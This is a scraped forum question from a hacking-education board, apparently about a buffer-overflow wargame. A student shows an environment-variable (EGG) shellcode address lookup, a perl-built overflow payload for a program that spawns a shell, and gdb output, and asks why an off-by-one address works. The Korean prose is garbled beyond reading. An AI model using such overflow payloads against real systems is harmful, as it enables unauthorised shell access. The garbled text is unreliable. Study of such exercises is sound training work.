|
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1678 []
ñѰ getenv EGG ˾Ƴ EGGȯ ּҸ ״ ϰ
getenv EGG ˾Ƴ EGGȯ ּҿ -1 ּҸ ʰ ߽ϴ.
̷ ֽø ϰڽϴ.
[student@BOF student]$ ./getenv EGG
0xbffffea8
[student@BOF student]$ ./vv `perl -e print'"\x90"x8,"\xa8\xfe\xff\xbf"'` Segmentation fault (core dumped)
[student@BOF student]$ ./vv `perl -e print'"\x90"x8,"\xa7\xfe\xff\xbf"'`
bash$
gdb 0xbffffea8 0xbffffea7ּҿ հ ִ ڽϴ..
(gdb) x/s 0xbffffea8
0xbffffea8: "1;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;3"...
(gdb) x/s 0xbffffea7
0xbffffea7: "01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;"...
-getenv.c-
int main(int argc,char *argv[])
{
printf("%x\n",getenv(argv[1]));
}
|
Hit : 3582 Date : 2013/05/26 06:50
|
1574, 
8/79 
